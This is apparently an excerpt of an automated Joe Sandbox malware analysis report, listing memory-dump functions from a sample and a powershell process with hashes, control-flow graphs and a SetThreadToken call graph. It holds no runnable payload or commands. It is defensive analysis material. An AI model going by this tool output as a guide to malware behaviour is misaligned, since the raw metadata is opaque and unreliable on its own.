                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 6a9cf2a004831e94ed7f43ea5843d1a7707eac8f56f4b3f3485e76c3db52a1fe
                                                                                                                                        • Instruction ID: df93fb17dcbc6df7955e0dc97157163d95b471c68c78cc1afac584394f9ea38d
                                                                                                                                        • Opcode Fuzzy Hash: 6a9cf2a004831e94ed7f43ea5843d1a7707eac8f56f4b3f3485e76c3db52a1fe
                                                                                                                                        • Instruction Fuzzy Hash: 43213470C0420A8FCB04DFA8D9445EEBFF0EF4A304F0451AAD449BB264EB355A84CFA1
                                                                                                                                        Function 00EABD08 Relevance: .1, Instructions: 57COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 618ffc4146ec310c561c42f246cdff44bec678ea50044bb8c70fadc9adf20681
                                                                                                                                        • Instruction ID: f5c4a56014af6af306a9b62c188f58d8ab5dd03db9694d44bbecebc30105a8e4
                                                                                                                                        • Opcode Fuzzy Hash: 618ffc4146ec310c561c42f246cdff44bec678ea50044bb8c70fadc9adf20681
                                                                                                                                        • Instruction Fuzzy Hash: 5D11A331E003098BCB24EFB8848069EBBF2AF8D315B141539D805FB202DB31AC01C7A1
                                                                                                                                        Function 00EA4851 Relevance: .1, Instructions: 54COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 8e18c3b5da1bb4529d97f3a1a0dd280efd4bba596571e562fca2068a68919d16
                                                                                                                                        • Instruction ID: 172bf06f38084ce053f08fa8452eaceaf20553f8a7f681cde0b41b15dc2fe6c4
                                                                                                                                        • Opcode Fuzzy Hash: 8e18c3b5da1bb4529d97f3a1a0dd280efd4bba596571e562fca2068a68919d16
                                                                                                                                        • Instruction Fuzzy Hash: 0E01D272B043500FDB189B79985453E7BDA9ECA2683144479D404DB398ED68DC018792
                                                                                                                                        Function 00EAAE88 Relevance: .1, Instructions: 51COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 775843d48023f20e121b249232b4f9531d51c1673504f3b3c48d8ef11ce793d9
                                                                                                                                        • Instruction ID: 49be489a8ab21c0d67aed0f1de78c0830c63b8a08f1e912676080b3bcdf862ee
                                                                                                                                        • Opcode Fuzzy Hash: 775843d48023f20e121b249232b4f9531d51c1673504f3b3c48d8ef11ce793d9
                                                                                                                                        • Instruction Fuzzy Hash: 0B01B1B67013109FD7188F68E88496AB7A8FB8D714716567AE105DB310EB31FD40CBA1
                                                                                                                                        Function 00EA4860 Relevance: .0, Instructions: 49COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 22a6f01a4b7900887504198a10dc18cee16f79591f0c328c3997fe704225db51
                                                                                                                                        • Instruction ID: 6d04f736915cdafed55bcf52eb12e4664bc40655f1585cdace74e7786d2b6620
                                                                                                                                        • Opcode Fuzzy Hash: 22a6f01a4b7900887504198a10dc18cee16f79591f0c328c3997fe704225db51
                                                                                                                                        • Instruction Fuzzy Hash: AF01F272B002100FD728AB7D980453E7ADBAFC83683144039E905DB398FEB8DC014B92
                                                                                                                                        Function 00EABAE9 Relevance: .0, Instructions: 48COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 9baf5163d0932288b5773645611810a6e09a12e16341d2e3317817825acca1fc
                                                                                                                                        • Instruction ID: 1870f6951c01bc5fb004631286cb7c5b4520e71de8e35084959a2b388e637dd2
                                                                                                                                        • Opcode Fuzzy Hash: 9baf5163d0932288b5773645611810a6e09a12e16341d2e3317817825acca1fc
                                                                                                                                        • Instruction Fuzzy Hash: 5901D6367003049BCB156778D859B6B3FD6EBC9625F140526E60AC7385DF35DD11C790
                                                                                                                                        Function 00EAA508 Relevance: .0, Instructions: 46COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2604c40c1d7f008e0e45030eb36ef43ffc6d03088a1c7310df0b0bf93cae43b2
                                                                                                                                        • Instruction ID: 42d7655ead27a88041fe56e46aa7803e6c3d7eba835afb79736c852f2e979812
                                                                                                                                        • Opcode Fuzzy Hash: 2604c40c1d7f008e0e45030eb36ef43ffc6d03088a1c7310df0b0bf93cae43b2
                                                                                                                                        • Instruction Fuzzy Hash: 06018075E002099FDF14AF69D854AAF7BB5EF88310B00453AEE1597240DB309D10CBE1
                                                                                                                                        Function 00EAA4F9 Relevance: .0, Instructions: 43COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: bb5adeb346e2e30e9f18ef36487090796238f520bb3e9a674db1486bce737130
                                                                                                                                        • Instruction ID: 048f7d76b5a8e2b6529476afc5f0eb82fbb2d9bd5a492c9b0c82825951993730
                                                                                                                                        • Opcode Fuzzy Hash: bb5adeb346e2e30e9f18ef36487090796238f520bb3e9a674db1486bce737130
                                                                                                                                        • Instruction Fuzzy Hash: 61015E75E00259AFCB15DF69D8546AEBFB5EB88314B04453AEA15D3241D7308D20DB92
                                                                                                                                        Function 00EABDA0 Relevance: .0, Instructions: 42COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d0e82e465ecd78447d7ac15b84dc1faf6dd0aa5a78d9e77670f5ff80fd0cdb4c
                                                                                                                                        • Instruction ID: 1ac1863941f0d474ba950b60d758b3a451305626dc56a6e2d76c4142e0586410
                                                                                                                                        • Opcode Fuzzy Hash: d0e82e465ecd78447d7ac15b84dc1faf6dd0aa5a78d9e77670f5ff80fd0cdb4c
                                                                                                                                        • Instruction Fuzzy Hash: 99F024327041159BCB159A7AE44069EBBE9DFCA331B04007AF108EF351CF72EC028750
                                                                                                                                        Function 00EAB5EA Relevance: .0, Instructions: 36COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 762d35bd451d11e8af0650e76f4a3de1f153f5835bbaff2e828b2973aecece8b
                                                                                                                                        • Instruction ID: 70fda5806dcf5ca51ad2992440880e0efbe7e716486268ffc5eb9006cf058d5a
                                                                                                                                        • Opcode Fuzzy Hash: 762d35bd451d11e8af0650e76f4a3de1f153f5835bbaff2e828b2973aecece8b
                                                                                                                                        • Instruction Fuzzy Hash: CEF090B2A00208AF8B50DFAAD841ADFBBF5FB8C210B10453AE505E3201E770A9159BE1
                                                                                                                                        Function 00EABA98 Relevance: .0, Instructions: 33COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f54e3a1d900acdce34205706f5bf5fe4335b8188c1b1b3ae33d4a074765e7e01
                                                                                                                                        • Instruction ID: 0e8f51d87e2e768e6603eab6e0f93568c1b53823954aed6b4e7bdac9db67a819
                                                                                                                                        • Opcode Fuzzy Hash: f54e3a1d900acdce34205706f5bf5fe4335b8188c1b1b3ae33d4a074765e7e01
                                                                                                                                        • Instruction Fuzzy Hash: D2F03A353002059FC700DF59D484D5ABBEAFF8D7257554169E6098B331CB71AC11CB80
                                                                                                                                        Function 00EA46C8 Relevance: .0, Instructions: 30COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 71a8aca28fed6523b16a2afb688d68311f7c322b36beedc32a61d22142880b86
                                                                                                                                        • Instruction ID: 245b4eb3c05a578c36a7d2c54757b063a0796463bbf64c3752e42fcbcc14b594
                                                                                                                                        • Opcode Fuzzy Hash: 71a8aca28fed6523b16a2afb688d68311f7c322b36beedc32a61d22142880b86
                                                                                                                                        • Instruction Fuzzy Hash: 23F0C936026B868FE3192B22ADBC23A7F64EB0B317B442C41E54AA6071DFB51458CF55
                                                                                                                                        Function 00EA46D8 Relevance: .0, Instructions: 25COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 6f24e15a16f584a232871496205a66809c91b375dbd465ba0af42e2aacbe5736
                                                                                                                                        • Instruction ID: 98a3dce8c171c64ddb072b5a6c4f4a167e2926664fe09346217e2612e15c1fbb
                                                                                                                                        • Opcode Fuzzy Hash: 6f24e15a16f584a232871496205a66809c91b375dbd465ba0af42e2aacbe5736
                                                                                                                                        • Instruction Fuzzy Hash: ECE0B636021B468FE3182B22BCBD23E7A65FB0B317B802C00E10EB10709FB0104CCE54
                                                                                                                                        Function 00EA1877 Relevance: .0, Instructions: 23COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 5bb26711c4fa7b462dd1c9b063b33a6d55fc92405635858e24c95f11878aa9b5
                                                                                                                                        • Instruction ID: ca98b5a909ef0865fc3d706ab27091b95879f411cb6993dc392d5b0ffd56646b
                                                                                                                                        • Opcode Fuzzy Hash: 5bb26711c4fa7b462dd1c9b063b33a6d55fc92405635858e24c95f11878aa9b5
                                                                                                                                        • Instruction Fuzzy Hash: 9FE08672D203255BCB02DFA4D8505EEB774EFD1311F954626D41473440F771155ACA91
                                                                                                                                        Function 00EA1888 Relevance: .0, Instructions: 19COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 150c806125e506545a74513719911e9d8789f2510dd1d54bdb3045710e83f9d2
                                                                                                                                        • Instruction ID: bce6413893972e748ec87163d947137af82a964163fa7852c34761ae07f26f1b
                                                                                                                                        • Opcode Fuzzy Hash: 150c806125e506545a74513719911e9d8789f2510dd1d54bdb3045710e83f9d2
                                                                                                                                        • Instruction Fuzzy Hash: C4D01231D2032A578B00A7A9DC144DEBB38EED5725B544626D51437140EB702659C6A1
                                                                                                                                        Function 00EABB48 Relevance: .0, Instructions: 17COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 640688851e02cf66430dae6cdee958f05b8628eb773548bd573156ede9986f66
                                                                                                                                        • Instruction ID: 345a843a1380eea66c88ae818321dd052f20704bcda0dcd9363903df805a4ad2
                                                                                                                                        • Opcode Fuzzy Hash: 640688851e02cf66430dae6cdee958f05b8628eb773548bd573156ede9986f66
                                                                                                                                        • Instruction Fuzzy Hash: ADD0C73A740114674B152A49A8048AF7BAEE7CD7727048126F91A83340CE714D2197D5
                                                                                                                                        Function 00EA4830 Relevance: .0, Instructions: 10COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e96bfb20e0ad62e2b09e4bcee41ad2f51dde2185893da2f425060ff834d56465
                                                                                                                                        • Instruction ID: 391a8d996efe6ba4c79ba733c5836388f53c54f22443a9369492b7a39979f608
                                                                                                                                        • Opcode Fuzzy Hash: e96bfb20e0ad62e2b09e4bcee41ad2f51dde2185893da2f425060ff834d56465
                                                                                                                                        • Instruction Fuzzy Hash: 8AC08C31808A948FCF130B20C8AA1507BF0ED0360030400C0C4924600AC2146523CF44

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 00EA1A40 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: X`r$X`r$X`r$X`r
                                                                                                                                        • API String ID: 0-3954137160
                                                                                                                                        • Opcode ID: 0c64c0234de6929ee204b4154009b0efae0ce9c96497ed4de5d20389b82d6d3f
                                                                                                                                        • Instruction ID: 52adda4ebcdcdd8a58676c7730806b5dcb3d4d73080a1ac8795522d4e6842570
                                                                                                                                        • Opcode Fuzzy Hash: 0c64c0234de6929ee204b4154009b0efae0ce9c96497ed4de5d20389b82d6d3f
                                                                                                                                        • Instruction Fuzzy Hash: 75316571E0131A8BDFA4CF7C85413AEB6E6AF9A314F1450EAC519BB250EB30DD409B92

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:4.8%
                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                        Signature Coverage:0%
                                                                                                                                        Total number of Nodes:9
                                                                                                                                        Total number of Limit Nodes:0
                                                                                                                                        execution_graph 16786 8f82f50 16787 8f82fad 16786->16787 16788 8f83005 16786->16788 16787->16788 16791 8f80a08 16787->16791 16794 8f80a01 16787->16794 16792 8f80a4b SetThreadToken 16791->16792 16793 8f80a79 16792->16793 16793->16788 16795 8f80a4b SetThreadToken 16794->16795 16796 8f80a79 16795->16796 16796->16788

                                                                                                                                        Executed Functions

                                                                                                                                        Function 06CCAA99 Relevance: .3, Instructions: 257COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 764 6ccaa99-6ccaac1 765 6ccaac6-6ccae01 call 6cca704 764->765 766 6ccaac3 764->766 827 6ccae06-6ccae0d 765->827 766->765
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 7097bb07f4360b1b33a6b4c5c8736213301d16f87e3b9e4b6d23fdd40b657a83
                                                                                                                                        • Instruction ID: fbaf4d8c5f57fce02aa438a2474d88c715eb9180a11eb8099a723e00fff63a22
                                                                                                                                        • Opcode Fuzzy Hash: 7097bb07f4360b1b33a6b4c5c8736213301d16f87e3b9e4b6d23fdd40b657a83
                                                                                                                                        • Instruction Fuzzy Hash: 33919071F007145FDB5AEBB888055AEBBE2EFC4704B04892DD506AB384DF34A9458B97
                                                                                                                                        Function 06CCAAA8 Relevance: .3, Instructions: 252COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 828 6ccaaa8-6ccaac1 829 6ccaac6-6ccae01 call 6cca704 828->829 830 6ccaac3 828->830 891 6ccae06-6ccae0d 829->891 830->829
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 34df9bb97fe2d109de167277cca7003fb6e6edda307cbfdd5485222e45ff2ed3
                                                                                                                                        • Instruction ID: e853efcb165f33692953372dd3f45b71d541b8c97fbe8bd74118a0ddb3bcefd4
                                                                                                                                        • Opcode Fuzzy Hash: 34df9bb97fe2d109de167277cca7003fb6e6edda307cbfdd5485222e45ff2ed3
                                                                                                                                        • Instruction Fuzzy Hash: 9191A071F007185BDB59EFB888045AEBAE2EFC4704B04892DD506AB384DF34A9458B9B
                                                                                                                                        Function 077D2308 Relevance: 22.8, Strings: 17, Instructions: 1530COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23027755201.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_77d0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'\r$4'\r$4'\r$4'\r$4'\r$4'\r$4'\r$4'\r$tP\r$tP\r$tP\r$tP\r$tP\r$tP\r$$\r$$\r$$\r
                                                                                                                                        • API String ID: 0-3195921003
                                                                                                                                        • Opcode ID: 1213812b546d04a48a903ada485869bcec47c06c0314713fa77c3ffdfb56b3fd
                                                                                                                                        • Instruction ID: 6fe58fe62e8abc68547c52b2bec2c691be707f568e04436a5b311795b975b52f
                                                                                                                                        • Opcode Fuzzy Hash: 1213812b546d04a48a903ada485869bcec47c06c0314713fa77c3ffdfb56b3fd
                                                                                                                                        • Instruction Fuzzy Hash: 5CB25CB2B04306DFEB118B6885157AABBF1BF86251F14C8BBD445CB256DB71CC42C7A2
                                                                                                                                        Function 077D3CE8 Relevance: 5.6, Strings: 4, Instructions: 577COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 461 77d3ce8-77d3d0d 462 77d3f00-77d3f16 461->462 463 77d3d13-77d3d18 461->463 473 77d3f1f-77d3f4a 462->473 474 77d3f18-77d3f1e 462->474 464 77d3d1a-77d3d20 463->464 465 77d3d30-77d3d34 463->465 469 77d3d24-77d3d2e 464->469 470 77d3d22 464->470 466 77d3d3a-77d3d3c 465->466 467 77d3eb0-77d3eba 465->467 471 77d3d4c 466->471 472 77d3d3e-77d3d4a 466->472 475 77d3ebc-77d3ec5 467->475 476 77d3ec8-77d3ece 467->476 469->465 470->465 477 77d3d4e-77d3d50 471->477 472->477 478 77d40ce-77d40de 473->478 479 77d3f50-77d3f55 473->479 474->473 480 77d3ed4-77d3ee0 476->480 481 77d3ed0-77d3ed2 476->481 477->467 484 77d3d56-77d3d75 477->484 493 77d40e7-77d4112 478->493 494 77d40e0-77d40e6 478->494 485 77d3f6d-77d3f71 479->485 486 77d3f57-77d3f5d 479->486 483 77d3ee2-77d3efd 480->483 481->483 516 77d3d85 484->516 517 77d3d77-77d3d83 484->517 489 77d3f77-77d3f79 485->489 490 77d4080-77d408a 485->490 491 77d3f5f 486->491 492 77d3f61-77d3f6b 486->492 496 77d3f89 489->496 497 77d3f7b-77d3f87 489->497 498 77d408c-77d4094 490->498 499 77d4097-77d409d 490->499 491->485 492->485 502 77d4228-77d425d 493->502 503 77d4118-77d411d 493->503 494->493 504 77d3f8b-77d3f8d 496->504 497->504 505 77d409f-77d40a1 499->505 506 77d40a3-77d40af 499->506 526 77d425f-77d4281 502->526 527 77d428b-77d4295 502->527 507 77d411f-77d4125 503->507 508 77d4135-77d4139 503->508 504->490 510 77d3f93-77d3fb2 504->510 511 77d40b1-77d40cb 505->511 506->511 513 77d4129-77d4133 507->513 514 77d4127 507->514 518 77d413f-77d4141 508->518 519 77d41da-77d41e4 508->519 549 77d3fb4-77d3fc0 510->549 550 77d3fc2 510->550 513->508 514->508 522 77d3d87-77d3d89 516->522 517->522 523 77d4151 518->523 524 77d4143-77d414f 518->524 528 77d41e6-77d41ee 519->528 529 77d41f1-77d41f7 519->529 522->467 535 77d3d8f-77d3d96 522->535 536 77d4153-77d4155 523->536 524->536 564 77d42d5-77d42fe 526->564 565 77d4283-77d4288 526->565 532 77d429f-77d42a5 527->532 533 77d4297-77d429c 527->533 530 77d41fd-77d4209 529->530 531 77d41f9-77d41fb 529->531 538 77d420b-77d4225 530->538 531->538 539 77d42ab-77d42b7 532->539 540 77d42a7-77d42a9 532->540 535->462 542 77d3d9c-77d3da1 535->542 536->519 537 77d415b-77d415d 536->537 545 77d415f-77d4165 537->545 546 77d4177-77d417e 537->546 548 77d42b9-77d42d2 539->548 540->548 551 77d3db9-77d3dc8 542->551 552 77d3da3-77d3da9 542->552 556 77d4169-77d4175 545->556 557 77d4167 545->557 558 77d4196-77d41d7 546->558 559 77d4180-77d4186 546->559 562 77d3fc4-77d3fc6 549->562 550->562 551->467 573 77d3dce-77d3dec 551->573 553 77d3dad-77d3db7 552->553 554 77d3dab 552->554 553->551 554->551 556->546 557->546 567 77d4188 559->567 568 77d418a-77d4194 559->568 562->490 563 77d3fcc-77d4003 562->563 588 77d401d-77d4024 563->588 589 77d4005-77d400b 563->589 582 77d432d-77d433e 564->582 583 77d4300-77d4326 564->583 567->558 568->558 573->467 586 77d3df2-77d3e17 573->586 595 77d4347-77d435c 582->595 596 77d4340-77d4346 582->596 583->582 586->467 610 77d3e1d-77d3e24 586->610 593 77d403c-77d407d 588->593 594 77d4026-77d402c 588->594 591 77d400d 589->591 592 77d400f-77d401b 589->592 591->588 592->588 600 77d402e 594->600 601 77d4030-77d403a 594->601 602 77d435e-77d437b 595->602 603 77d4395-77d439f 595->603 596->595 600->593 601->593 613 77d437d-77d438f 602->613 614 77d43e5-77d43ea 602->614 605 77d43a8-77d43ae 603->605 606 77d43a1-77d43a5 603->606 611 77d43b4-77d43c0 605->611 612 77d43b0-77d43b2 605->612 615 77d3e6a-77d3e9d 610->615 616 77d3e26-77d3e41 610->616 617 77d43c2-77d43e2 611->617 612->617 613->603 614->613 632 77d3ea4-77d3ead 615->632 623 77d3e5b-77d3e5f 616->623 624 77d3e43-77d3e49 616->624 629 77d3e66-77d3e68 623->629 626 77d3e4d-77d3e59 624->626 627 77d3e4b 624->627 626->623 627->623 629->632
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23027755201.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_77d0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'\r$4'\r$4'\r$4'\r
                                                                                                                                        • API String ID: 0-1723783688
                                                                                                                                        • Opcode ID: 4b335c9f694b5c929abc430a135ee37b7b036b54e927dcd31a72dfde987a5275
                                                                                                                                        • Instruction ID: 103943b1139b6d18fb2b2db3d3f5c781a38c6d0ab9b87307b5f936d7811588e8
                                                                                                                                        • Opcode Fuzzy Hash: 4b335c9f694b5c929abc430a135ee37b7b036b54e927dcd31a72dfde987a5275
                                                                                                                                        • Instruction Fuzzy Hash: 26124AB1704381DFDB159B68C8117AABBF29FC6290F1488BBD905CB296DB71DC41C7A2
                                                                                                                                        Function 08F80A01 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 636 8f80a01-8f80a77 SetThreadToken 638 8f80a79-8f80a7f 636->638 639 8f80a80-8f80a9d 636->639 638->639
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
